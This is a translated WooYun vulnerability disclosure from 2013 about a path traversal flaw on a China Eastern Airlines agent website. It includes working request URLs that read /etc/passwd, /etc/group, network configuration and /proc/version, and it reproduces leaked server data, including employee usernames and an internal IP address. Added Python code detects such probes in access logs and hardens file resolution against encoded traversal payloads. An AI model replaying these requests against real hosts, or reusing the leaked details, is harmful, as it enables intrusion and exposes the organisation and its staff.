Vulnerability summary

Defect ID: wooyun-2013-040171

Title: File traversal on a China Eastern Airlines site allows files from an important system to be downloaded

Vendor: China Eastern Airlines Co., Ltd. (中国东方航空股份有限公司)

Author: 霍大然

Submitted: 2013-10-18 13:25

Fix date: 2013-12-02 13:26

Public disclosure: 2013-12-02 13:26

Type: arbitrary file traversal/download

Severity: high

Self-assessed Rank: 11

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-10-18: Details sent to the vendor; awaiting vendor handling
2013-10-18: Vendor confirmed; details visible to the vendor only
2013-10-28: Details disclosed to core white hats and relevant domain experts
2013-11-07: Details disclosed to regular white hats
2013-11-17: Details disclosed to intern white hats
2013-12-02: Details disclosed to the public

Brief description:

File traversal on a China Eastern Airlines site allows files from an important system to be downloaded

Detailed description:

Affected site:
http://ceagent.ceair.com/

[Screenshot: 1.jpg]


1. /etc/passwd
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/passwd

[Screenshot: 1-1.jpg]


That's a lot of users.
2. /etc/sysctl.conf
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysctl.conf

[Screenshot: 1-2.jpg]


3. /etc/group
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/group
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root
lp:x:7:daemon,lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
games:x:20:
gopher:x:30:
dip:x:40:
ftp:x:50:
lock:x:54:
nobody:x:99:
users:x:100:
nscd:x:28:
floppy:x:19:
vcsa:x:69:
pcap:x:77:
utmp:x:22:
utempter:x:35:
slocate:x:21:
rpc:x:32:
mailnull:x:47:
smmsp:x:51:
rpcuser:x:29:
nfsnobody:x:4294967294:
sshd:x:74:
dbus:x:81:
haldaemon:x:68:
avahi-autoipd:x:101:
avahi:x:70:
apache:x:48:
ntp:x:38:
xfs:x:43:
gdm:x:42:
sabayon:x:86:
stapdev:x:102:
stapusr:x:103:
hw:x:500:
was:x:403:was7
wl:x:105:
ot:x:201:
os:x:203:
bk:x:205:
rd:x:206:
et:x:207:
cs:x:208:
ap:x:209:
nw:x:211:
tux:x:401:
mqm:x:402:
uni:x:111:
rduser:x:501:
op:x:212:
td:x:213:
jboss:x:214:
hexuan:x:12071:
lixue:x:10053:
zhangjin:x:12076:
4. Network configuration:
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
ONBOOT=yes
USERCTL=no
BOOTPROTO=static
NETMASK=255.255.255.0
IPADDR=10.6.141.90
PEERDNS=yes
check_link_down() {
return 1;
}
5. /etc/services
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/services

[Screenshot: 1-3.jpg]

Proof of vulnerability:

http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/proc/version
Linux version 2.6.18-128.el5 (mockbuild@hs20-bc1-7.build.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-44)) #1 SMP Wed Dec 17 11:41:38 EST 2008
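Every request above carries the target path in plain sight in the query string, so the web server's access log is the easiest place to find this probing after the fact. The script below is an added example written for this page, not code from the report or from China Eastern; the log lines in it are constructed in the request pattern the report shows (the IPs, timestamps, status codes and sizes are made up). It decodes each inputPath value a second time so double-encoded traversal is not missed, and flags absolute paths, dot-dot segments, and values that normalise to a well-known sensitive file.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined-log style) in the request pattern the report
# shows; IPs, timestamps, status codes and sizes are made up, not real ceair.com traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2013:13:20:01 +0800] "GET /ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/passwd HTTP/1.1" 200 1834
10.0.0.5 - - [18/Oct/2013:13:20:09 +0800] "GET /ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=..%2F..%2Fetc%2Fgroup HTTP/1.1" 200 944
10.0.0.7 - - [18/Oct/2013:13:21:44 +0800] "GET /ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=reports/2013-10.pdf HTTP/1.1" 200 50231
10.0.0.9 - - [18/Oct/2013:13:22:03 +0800] "GET /ceagent/index.shtml HTTP/1.1" 200 3101
10.0.0.5 - - [18/Oct/2013:13:25:31 +0800] "GET /ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=%252e%252e%2fproc%2fversion HTTP/1.1" 200 173
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The files the report pulled, plus the usual first stops for this bug class.
SENSITIVE = {"/etc/passwd", "/etc/group", "/etc/shadow", "/etc/sysctl.conf",
             "/etc/services", "/proc/version", "/etc/sysconfig/network-scripts/ifcfg-eth0"}

# Only this action is the vulnerable endpoint; every other request is ignored.
VULN_ACTION = "/ceagent/front/file/file-download!downloadFromServer.shtml"


def normalize_input_path(value):
    """Decode once more and normalise against "/", so "../../etc/group", "..\\..\\etc\\group"
    and "/etc/group" all become "/etc/group"."""
    decoded = unquote(value).replace("\\", "/")
    return posixpath.normpath("/" + decoded.lstrip("/"))


def classify_input_path(value):
    """Return the reasons an inputPath value looks malicious (empty list if it looks benign).

    `value` is the once-decoded form parse_qs yields; the extra unquote() exposes double
    encoding such as %252e%252e (-> %2e%2e -> ..).
    """
    decoded = unquote(value).replace("\\", "/")
    reasons = []
    if decoded.startswith("/"):
        reasons.append("absolute path")
    if ".." in decoded.split("/"):
        reasons.append("dot-dot traversal")
    if normalize_input_path(value) in SENSITIVE:
        reasons.append("sensitive target")
    return reasons


def scan_log(text):
    """One hit per flagged request: who asked, what they asked for, and whether it succeeded."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != VULN_ACTION:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("inputPath", []):
            reasons = classify_input_path(value)
            if reasons:
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "inputPath": value,
                    "resolved": normalize_input_path(value),
                    "status": int(m.group("status")),   # 200 means the read succeeded
                    "reasons": reasons,
                })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%(time)s %(ip)s inputPath=%(inputPath)r -> %(resolved)s "
              "status=%(status)d reasons=%(reasons)s" % hit)
```

The status code is kept in each hit on purpose: a 200 on a flagged request means the file was actually served, which turns an attempted read into a confirmed one and tells the responder which files to treat as exposed.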

Fix recommendation:

Validate the inputPath parameter: reject absolute paths and ".." segments, and only serve files that resolve inside a fixed download directory.
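A concrete version of that recommendation, as an added example and not the site's own code (the action!method form of the URL suggests a Struts 2 application; the Python below reconstructs the logic rather than the original handler, and the DOWNLOAD_ROOT directory is a hypothetical value): the resolution that produces the behaviour seen in the report, beside a hardened one. The hardened version rejects absolute paths, backslashes and NUL bytes, allow-lists every path segment so "." and ".." can never pass, and finally checks that the symlink-resolved result still lies under the download root.

```python
import os
import posixpath
import re
from urllib.parse import unquote

# Hypothetical download directory; the real application's layout is not known from the report.
DOWNLOAD_ROOT = "/opt/ceagent/files"

# Allow-list for a single path segment. A segment must start with a letter or digit,
# so ".", ".." and the empty segment produced by "//" can never match.
SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


class UnsafePath(ValueError):
    """Raised when inputPath does not name a file under DOWNLOAD_ROOT."""


def download_root():
    """Canonical download root (symlinks resolved); used for the containment check."""
    return os.path.realpath(DOWNLOAD_ROOT)


def resolve_vulnerable(input_path):
    """The behaviour the report demonstrates: inputPath is used as a filesystem path as-is.

    os.path.join drops the root entirely when the second argument is absolute, so
    "/etc/passwd" comes back unchanged, and "../../../etc/passwd" walks out of the root.
    """
    return os.path.normpath(os.path.join(DOWNLOAD_ROOT, input_path))


def resolve_safe(input_path):
    """Hardened resolution: refuse anything that does not stay inside DOWNLOAD_ROOT."""
    # Assumes the framework has already URL-decoded the parameter once; decoding again
    # here exposes double-encoded traversal such as %252e%252e%252f.
    decoded = unquote(input_path)
    if "\x00" in decoded or "\\" in decoded or posixpath.isabs(decoded):
        raise UnsafePath("absolute path, backslash or NUL byte in inputPath")
    segments = decoded.split("/")
    if not all(SAFE_SEGMENT.match(s) for s in segments):
        raise UnsafePath("path segment outside allow-list: %r" % decoded)
    root = download_root()
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Authoritative check: after symlink resolution the file must still be under root.
    # commonpath() rather than startswith(), so "/opt/ceagent/files2/x" is not accepted.
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafePath("resolved path escapes the download root")
    return candidate


def is_rejected(input_path):
    """True if resolve_safe() refuses input_path; handy for table-top checks of probes."""
    try:
        resolve_safe(input_path)
    except UnsafePath:
        return True
    return False


if __name__ == "__main__":
    for probe in ["reports/2013-10.pdf", "/etc/passwd", "../../../etc/passwd", "..%2F..%2Fetc%2Fgroup"]:
        outcome = "REJECTED" if is_rejected(probe) else resolve_safe(probe)
        print("%-24s vulnerable -> %-36s safe -> %s" % (probe, resolve_vulnerable(probe), outcome))
```

The allow-list and the containment check are deliberately both present: the allow-list gives a readable error and stops oddities such as encoded slashes early, while commonpath() over realpath() output is the test that holds even if a symlink inside the download directory points elsewhere.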

Copyright notice: when reposting, credit 霍大然@乌云


Vulnerability response

Vendor response:

Severity: medium

Rank: 5

Confirmed: 2013-10-18 16:50

Vendor reply:

Many thanks.

Latest status:

2013-10-21: Fixed.


Vulnerability rating:

Comments

  1. 2013-10-18 14:27 | 霍大然 ( regular white hat | Rank:1136 vulnerabilities:178 | W coins all spent; grind for points or not? )

    @疯狗 @xsser It was on the front page a moment ago; how did it turn into a minor vulnerability in the blink of an eye?